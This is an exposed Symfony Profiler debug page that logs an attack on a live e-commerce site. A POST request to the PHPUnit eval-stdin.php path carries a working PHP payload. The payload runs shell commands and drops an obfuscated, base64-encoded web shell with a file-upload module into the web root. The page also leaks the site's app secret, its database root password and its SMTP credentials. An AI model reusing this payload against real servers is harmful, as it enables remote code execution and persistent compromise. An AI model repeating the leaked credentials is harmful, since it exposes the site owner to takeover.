Symfony Profiler

Settings

n/a

Request

GET Parameters

No GET parameters

POST Parameters

Key	Value
1');$o	""" ob_get_contents();ob_end_clean();}\n elseif(function_exists('exec')){@exec($c.' 2> """
1');} elseif(function_exists('system')){ob_start();@system($c_'_2>	""
1',$a);$o	""" implode("\n",$a);}\n echo $o;\n echo 'XX_RCE_END_XX';\n $f = $_SERVER['DOCUMENT_ROOT'].'/web.config.php';\n $shell = base64_decode('PD9waHAgZXJyb3JfcmVwb3J0aW5nKDApOyRhPSdyZXYnOyRiPSdzdHInOyRjPSRiLiRhOyRrMD0nXycuJGMoJ1RFRycpOyRrMT0nXycuJGMoJ1RTT1AnKTskazI9J18nLiRjKCdTRUxJRicpOyRrMz0nXycuJGMoJ1JFVlJFUycpOyRrNT0kYygneXBvYycpOyRrNj0kYygnZWxiYXRpcndfc2knKTskazc9JGMoJ2VtYW51X3BocCcpOyRzYT0kYygnUkREQV9SRVZSRVMnKTskdT0kYygnZGFvbHB1Jyk7JGk9JGMoJ2VsaWZfeGRpJyk7JGRyPSRjKCdUT09SX1RORU1VQ09EJyk7JG5hPSRjKCdlbWFuJyk7JHRuPSRjKCdlbWFuX3BtdCcpOyRocz0kYygnU1BIVEgnKTskaGg9JGMoJ1RTT0hfUFRUSCcpO2lmKGlzc2V0KCQkazBbJ2FjYmFsNzc3MyddKSl7JHBybT0oJGs2KCcuJykpPyJXcml0YWJsZSDinJMiOiJSZWFkLU9ubHkg4pyXIjskc2lwPWlzc2V0KCQkazNbJHNhXSk/JCRrM1skc2FdOiJOL0EiOyRvc19pbmZvPSRrNygpO2VjaG8gIjxjZW50ZXI PHByZT49PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PVxuOjogICAgICAgICAgICAgICBYWHhTaGVsbCBBY2Nlc3N4WFggICAgICAgICAgICAgIDo6XG49PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PVxuPC9wcmU PGZpZWxkc2V0IHN0eWxlPSd3aWR0aDo1MDBweDsgYm9yZGVyLXN0eWxlOiBkYXNoZWQ7IHBhZGRpbmc6IDEwcHg7Jz48bGVnZW5kPlsgU3lzdGVtIFN0YXR1cyBdPC9sZWdlbmQ PHByZSBzdHlsZT0ndGV4dC1hbGlnbjogbGVmdDsgbWFyZ2luOiAwOyc V3JpdGUgQWNjZXNzOiAiLiRwcm0uIlxuTWFjaGluZSBPUyAgOiAiLiRvc19pbmZvLiJcblNlcnZlciBJUCAgIDogIi4kc2lwLiI8L3ByZT48L2ZpZWxkc2V0Pjxicj48ZmllbGRzZXQgc3R5bGU9J3dpZHRoOjUwMHB4OyBib3JkZXItc3R5bGU6IGRhc2hlZDsgcGFkZGluZzogMTBweDsnPjxsZWdlbmQ WyBGaWxlIEluamVjdGlvbiBNb2R1bGUgXTwvbGVnZW5kPjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc U2VsZWN0IGZpbGUgdG8gdHJhbnNmZXI6PGJyPjxicj48aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0naWR4X2ZpbGUnPjxpbnB1dCB0eXBlPSdzdWJtaXQnIG5hbWU9J3VwbG9hZCcgdmFsdWU9J1sgSW5pdGlhdGUgVHJhbnNmZXIgXSc PC9mb3JtPjwvZmllbGRzZXQ IjtpZihpc3NldCgkJGsxWyR1XSkpeyRmPSQkazJbJGldOyRyPSQkazNbJGRyXTskbj0kZlskbmFdOyR0PSRmWyR0bl07JGQ9JHIuJy8nLiRuOyR3PSJodHRwIi4oaXNzZXQoJCRrM1skaHNdKT8ncyc6JycpLiI6Ly8iLiRfU0VSVkVSWydIVFRQX0hPU1QnXTskbT0oJGs2KCRyKSk/KEAkazUoJHQsJGQpPyJb4pyTXSBTVEFUVVM6IFNVQ0NFU1MuIEZpbGUgbG9jYXRlZCBhdCAtPiA8YSBocmVmPSckdy8kbicgdGFyZ2V0PSdibGFuayc PGI JHcvJG48L2I PC9hPiI6IlvinJddIFNUQVRVUzogRkFJTEVEXG5bIV0gUkVBU09OOiBDYW5ub3Qgd3JpdGUgdG8gZGVzdGluYXRpb24gZGlyZWN0b3J5LiIpOihAJGs1KCR0LCRuKT8iW Kck10gU1RBVFVTOiBQQVJUSUFMIFNVQ0NFU1MuIFVwbG9hZGVkIHRvIGN1cnJlbnQgZGlyZWN0b3J5IC0 IDxiPiRuPC9iPiI6IlvinJddIFNUQVRVUzogQ1JJVElDQUwgRkFJTFVSRVxuWyFdIFJFQVNPTjogVXBsb2FkIHByb2Nlc3MgZmFpbGVkIGVudGlyZWx5LiIpO2VjaG8gIjxicj48ZmllbGRzZXQgc3R5bGU9J3dpZHRoOjUwMHB4OyBib3JkZXItc3R5bGU6IGRhc2hlZDsgcGFkZGluZzogMTBweDsnPjxsZWdlbmQ WyBUcmFuc21pc3Npb24gTG9nIF08L2xlZ2VuZD48cHJlIHN0eWxlPSd0ZXh0LWFsaWduOmxlZnQ7IG1hcmdpbjowOyc JG08L3ByZT48L2ZpZWxkc2V0PiI7fWVjaG8gIjwvY2VudGVyPiI7fSA/Pg==');\n @file_put_contents($f, $shell);\n echo 'XX_SHELL_URL_START_XX';\n echo (isset($_SERVER['HTTPS'])?'https':'http').'://'.$_SERVER['HTTP_HOST'].'/web.config.php?acbal7773';\n echo 'XX_SHELL_URL_END_XX';\n ?> """
<?php_@error_reporting(0); echo_'XX_RCE_START_XX'; $c_	""" base64_decode('aWQ=');\n $o = '';\n if(function_exists('shell_exec')){$o=@shell_exec($c.' 2> """

Uploaded Files

No files were uploaded

Request Attributes

Key	Value
_api_platform_links	Symfony\Component\WebLink\GenericLinkProvider {#1275`-links: [ 1273 => Symfony\Component\WebLink\Link {#1273 -href: "http://www.virtualrealitycommerce.eu/api/docs.jsonld" -rel: [ "http://www.w3.org/ns/hydra/core#apiDocumentation" => "http://www.w3.org/ns/hydra/core#apiDocumentation" ] -attributes: [] } ]`}
_remove_csp_headers	true
_stopwatch_token	"2362bb"

Key

Value

_api_platform_links

Symfony\Component\WebLink\GenericLinkProvider {#1275
  -links: [
    1273 => Symfony\Component\WebLink\Link {#1273
      -href: "http://www.virtualrealitycommerce.eu/api/docs.jsonld"
      -rel: [
        "http://www.w3.org/ns/hydra/core#apiDocumentation" => "http://www.w3.org/ns/hydra/core#apiDocumentation"
      ]
      -attributes: []
    }
  ]
}

_remove_csp_headers

true

_stopwatch_token

"2362bb"

Request Headers

Header	Value
accept-encoding	"gzip, deflate"
connection	"Keep-Alive"
content-length	"3289"
content-type	"application/x-www-form-urlencoded; charset=utf-8"
expect	"100-continue"
host	"www.virtualrealitycommerce.eu"
user-agent	"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
x-php-ob-level	"1"

Request Content

Raw

<?php @error_reporting(0);
echo 'XX_RCE_START_XX';
$c = base64_decode('aWQ=');
$o = '';
if(function_exists('shell_exec')){$o=@shell_exec($c.' 2>&1');}
elseif(function_exists('system')){ob_start();@system($c.' 2>&1');$o=ob_get_contents();ob_end_clean();}
elseif(function_exists('passthru')){ob_start();@passthru($c.' 2>&1');$o=ob_get_contents();ob_end_clean();}
elseif(function_exists('exec')){@exec($c.' 2>&1',$a);$o=implode("\n",$a);}
echo $o;
echo 'XX_RCE_END_XX';
$f = $_SERVER['DOCUMENT_ROOT'].'/web.config.php';
$shell = base64_decode('PD9waHAgZXJyb3JfcmVwb3J0aW5nKDApOyRhPSdyZXYnOyRiPSdzdHInOyRjPSRiLiRhOyRrMD0nXycuJGMoJ1RFRycpOyRrMT0nXycuJGMoJ1RTT1AnKTskazI9J18nLiRjKCdTRUxJRicpOyRrMz0nXycuJGMoJ1JFVlJFUycpOyRrNT0kYygneXBvYycpOyRrNj0kYygnZWxiYXRpcndfc2knKTskazc9JGMoJ2VtYW51X3BocCcpOyRzYT0kYygnUkREQV9SRVZSRVMnKTskdT0kYygnZGFvbHB1Jyk7JGk9JGMoJ2VsaWZfeGRpJyk7JGRyPSRjKCdUT09SX1RORU1VQ09EJyk7JG5hPSRjKCdlbWFuJyk7JHRuPSRjKCdlbWFuX3BtdCcpOyRocz0kYygnU1BIVEgnKTskaGg9JGMoJ1RTT0hfUFRUSCcpO2lmKGlzc2V0KCQkazBbJ2FjYmFsNzc3MyddKSl7JHBybT0oJGs2KCcuJykpPyJXcml0YWJsZSDinJMiOiJSZWFkLU9ubHkg4pyXIjskc2lwPWlzc2V0KCQkazNbJHNhXSk/JCRrM1skc2FdOiJOL0EiOyRvc19pbmZvPSRrNygpO2VjaG8gIjxjZW50ZXI+PHByZT49PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PVxuOjogICAgICAgICAgICAgICBYWHhTaGVsbCBBY2Nlc3N4WFggICAgICAgICAgICAgIDo6XG49PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PVxuPC9wcmU+PGZpZWxkc2V0IHN0eWxlPSd3aWR0aDo1MDBweDsgYm9yZGVyLXN0eWxlOiBkYXNoZWQ7IHBhZGRpbmc6IDEwcHg7Jz48bGVnZW5kPlsgU3lzdGVtIFN0YXR1cyBdPC9sZWdlbmQ+PHByZSBzdHlsZT0ndGV4dC1hbGlnbjogbGVmdDsgbWFyZ2luOiAwOyc+V3JpdGUgQWNjZXNzOiAiLiRwcm0uIlxuTWFjaGluZSBPUyAgOiAiLiRvc19pbmZvLiJcblNlcnZlciBJUCAgIDogIi4kc2lwLiI8L3ByZT48L2ZpZWxkc2V0Pjxicj48ZmllbGRzZXQgc3R5bGU9J3dpZHRoOjUwMHB4OyBib3JkZXItc3R5bGU6IGRhc2hlZDsgcGFkZGluZzogMTBweDsnPjxsZWdlbmQ+WyBGaWxlIEluamVjdGlvbiBNb2R1bGUgXTwvbGVnZW5kPjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+U2VsZWN0IGZpbGUgdG8gdHJhbnNmZXI6PGJyPjxicj48aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0naWR4X2ZpbGUnPjxpbnB1dCB0eXBlPSdzdWJtaXQnIG5hbWU9J3VwbG9hZCcgdmFsdWU9J1sgSW5pdGlhdGUgVHJhbnNmZXIgXSc+PC9mb3JtPjwvZmllbGRzZXQ+IjtpZihpc3NldCgkJGsxWyR1XSkpeyRmPSQkazJbJGldOyRyPSQkazNbJGRyXTskbj0kZlskbmFdOyR0PSRmWyR0bl07JGQ9JHIuJy8nLiRuOyR3PSJodHRwIi4oaXNzZXQoJCRrM1skaHNdKT8ncyc6JycpLiI6Ly8iLiRfU0VSVkVSWydIVFRQX0hPU1QnXTskbT0oJGs2KCRyKSk/KEAkazUoJHQsJGQpPyJb4pyTXSBTVEFUVVM6IFNVQ0NFU1MuIEZpbGUgbG9jYXRlZCBhdCAtPiA8YSBocmVmPSckdy8kbicgdGFyZ2V0PSdibGFuayc+PGI+JHcvJG48L2I+PC9hPiI6IlvinJddIFNUQVRVUzogRkFJTEVEXG5bIV0gUkVBU09OOiBDYW5ub3Qgd3JpdGUgdG8gZGVzdGluYXRpb24gZGlyZWN0b3J5LiIpOihAJGs1KCR0LCRuKT8iW+Kck10gU1RBVFVTOiBQQVJUSUFMIFNVQ0NFU1MuIFVwbG9hZGVkIHRvIGN1cnJlbnQgZGlyZWN0b3J5IC0+IDxiPiRuPC9iPiI6IlvinJddIFNUQVRVUzogQ1JJVElDQUwgRkFJTFVSRVxuWyFdIFJFQVNPTjogVXBsb2FkIHByb2Nlc3MgZmFpbGVkIGVudGlyZWx5LiIpO2VjaG8gIjxicj48ZmllbGRzZXQgc3R5bGU9J3dpZHRoOjUwMHB4OyBib3JkZXItc3R5bGU6IGRhc2hlZDsgcGFkZGluZzogMTBweDsnPjxsZWdlbmQ+WyBUcmFuc21pc3Npb24gTG9nIF08L2xlZ2VuZD48cHJlIHN0eWxlPSd0ZXh0LWFsaWduOmxlZnQ7IG1hcmdpbjowOyc+JG08L3ByZT48L2ZpZWxkc2V0PiI7fWVjaG8gIjwvY2VudGVyPiI7fSA/Pg==');
@file_put_contents($f, $shell);
echo 'XX_SHELL_URL_START_XX';
echo (isset($_SERVER['HTTPS'])?'https':'http').'://'.$_SERVER['HTTP_HOST'].'/web.config.php?acbal7773';
echo 'XX_SHELL_URL_END_XX';
?>

Response

Response Headers

Header	Value
cache-control	"no-cache, private"
content-type	"text/html; charset=UTF-8"
date	"Wed, 06 May 2026 12:45:38 GMT"
x-debug-exception	"No%20route%20found%20for%20%22POST%20http%3A%2F%2Fwww.virtualrealitycommerce.eu%2Fvendor%2Fphpunit%2Fphpunit%2Fsrc%2FUtil%2FPHP%2Feval-stdin.php%22"
x-debug-exception-file	"%2Fvar%2Fwww%2Fwebexciter%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:128"
x-debug-token	"a849d7"
x-previous-debug-token	"d2e49b"
x-robots-tag	"noindex"

Cookies

Request Cookies

No request cookies

Response Cookies

No response cookies

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Session Usage

0 Usages

Stateless check enabled

Session not used.

Flashes

No flash messages were created.

Server Parameters

Defined in .env

Key	Value
APP_ENV	"dev"
APP_SECRET	"6cd0c47bbe7a0feccacf6fed3a8f7ff3"
CORS_ALLOW_ORIGIN	"^https?://(localhost\|127\.0\.0\.1)(:[0-9]+)?$"
DATABASE_URL	"mysql://root:pswdb33@127.0.0.1:3306/alliancemarkets2"
DYNAMIC_DATABASE_URL	"mysql://root:pswdb33@127.0.0.1:3306/am_demo"
ESHOP_DEMO_DATABASE_URL	"mysql://root:pswdb33@127.0.0.1:3306/am_demo"
MAILER_DSN	"smtp://info@virtualrealitycommerce.cz:p3U1b4j1-j1!@smtp.web4u.cz:587"
MESSENGER_TRANSPORT_DSN	"doctrine://default?auto_setup=0"

Defined as regular env variables

Key	Value
APP_DEBUG	"1"
CONTENT_LENGTH	"3289"
CONTENT_TYPE	"application/x-www-form-urlencoded; charset=utf-8"
CONTEXT_DOCUMENT_ROOT	"/var/www/webexciter/public"
CONTEXT_PREFIX	""
DOCUMENT_ROOT	"/var/www/webexciter/public"
GATEWAY_INTERFACE	"CGI/1.1"
HTTP_ACCEPT_ENCODING	"gzip, deflate"
HTTP_CONNECTION	"Keep-Alive"
HTTP_EXPECT	"100-continue"
HTTP_HOST	"www.virtualrealitycommerce.eu"
HTTP_USER_AGENT	"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
PATH	"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
PHP_SELF	"/index.php"
QUERY_STRING	""
REDIRECT_STATUS	"200"
REDIRECT_URL	"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
REMOTE_ADDR	"103.59.160.93"
REMOTE_PORT	"51738"
REQUEST_METHOD	"POST"
REQUEST_SCHEME	"http"
REQUEST_TIME	1778071536
REQUEST_TIME_FLOAT	1778071536.6832
REQUEST_URI	"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
SCRIPT_FILENAME	"/var/www/webexciter/public/index.php"
SCRIPT_NAME	"/index.php"
SERVER_ADDR	"81.91.93.29"
SERVER_ADMIN	"webexciter@yahoo.com"
SERVER_NAME	"www.virtualrealitycommerce.eu"
SERVER_PORT	"80"
SERVER_PROTOCOL	"HTTP/1.1"
SERVER_SIGNATURE	"<address>Apache/2.4.25 (Debian) Server at www.virtualrealitycommerce.eu Port 80</address>\n"
SERVER_SOFTWARE	"Apache/2.4.25 (Debian)"
SYMFONY_DOTENV_VARS	"APP_ENV,APP_SECRET,DATABASE_URL,DYNAMIC_DATABASE_URL,ESHOP_DEMO_DATABASE_URL,MESSENGER_TRANSPORT_DSN,MAILER_DSN,CORS_ALLOW_ORIGIN"

Sub Requests 1

ErrorController (token = d2e49b)

Key	Value
_api_platform_links	Symfony\Component\WebLink\GenericLinkProvider {#974`-links: [ 972 => Symfony\Component\WebLink\Link {#972 -href: "http://www.virtualrealitycommerce.eu/api/docs.jsonld" -rel: [ "http://www.w3.org/ns/hydra/core#apiDocumentation" => "http://www.w3.org/ns/hydra/core#apiDocumentation" ] -attributes: [] } ]`}
_controller	"error_controller"
_stopwatch_token	"f66160"
exception	Symfony\Component\HttpKernel\Exception\NotFoundHttpException {#664#message: "No route found for "POST http://www.virtualrealitycommerce.eu/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"" #code: 0 #file: "/var/www/webexciter/vendor/symfony/http-kernel/EventListener/RouterListener.php" #line: 128 -previous: Symfony\Component\Routing\Exception\ResourceNotFoundException {#597 …} -statusCode: 404 -headers: [] trace: { /var/www/webexciter/vendor/symfony/http-kernel/EventListener/RouterListener.php:128 { Symfony\Component\HttpKernel\EventListener\RouterListener->onKernelRequest(RequestEvent $event) … › › throw new NotFoundHttpException($message, $e); › } catch (MethodNotAllowedException $e) { } /var/www/webexciter/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:115 { Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void … › › ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher); › } /var/www/webexciter/vendor/symfony/event-dispatcher/EventDispatcher.php:230 { Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event) … › } › $listener($event, $eventName, $this); › } } /var/www/webexciter/vendor/symfony/event-dispatcher/EventDispatcher.php:59 { Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, string $eventName = null): object … › if ($listeners) { › $this->callListeners($listeners, $eventName, $event); › } } /var/www/webexciter/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:153 { Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, string $eventName = null): object … › try { › $this->dispatcher->dispatch($event, $eventName); › } finally { } /var/www/webexciter/vendor/symfony/http-kernel/HttpKernel.php:139 { Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response … › $event = new RequestEvent($this, $request, $type); › $this->dispatcher->dispatch($event, KernelEvents::REQUEST); › } /var/www/webexciter/vendor/symfony/http-kernel/HttpKernel.php:75 { Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true): Response … › try { › return $this->handleRaw($request, $type); › } catch (\Exception $e) { } /var/www/webexciter/vendor/symfony/http-kernel/Kernel.php:202 { Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true): Response … › try { › return $this->getHttpKernel()->handle($request, $type, $catch); › } finally { } /var/www/webexciter/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php:35 { Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner->run(): int … › { › $response = $this->kernel->handle($this->request); › $response->send(); } /var/www/webexciter/vendor/autoload_runtime.php:29 { require_once … › ->getRunner($app) › ->run() › ); } /var/www/webexciter/public/index.php:5 { › › require_once dirname(__DIR__).'/vendor/autoload_runtime.php'; › arguments: { "/var/www/webexciter/vendor/autoload_runtime.php" } } }}
logger	Symfony\Bridge\Monolog\Logger {#187 …9}

Symfony Profiler

http://www.virtualrealitycommerce.eu/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Configuration Settings

Theme

Page Width

n/a

Request

GET Parameters

POST Parameters

Uploaded Files

Request Attributes

Request Headers

Request Content

Raw

Response

Response Headers

Cookies

Request Cookies

Response Cookies

Session

Session Metadata

Session Attributes

Session Usage

Flashes

Flashes

Server Parameters

Server Parameters

Defined in .env

Defined as regular env variables

Sub Requests 1

ErrorController (token = d2e49b)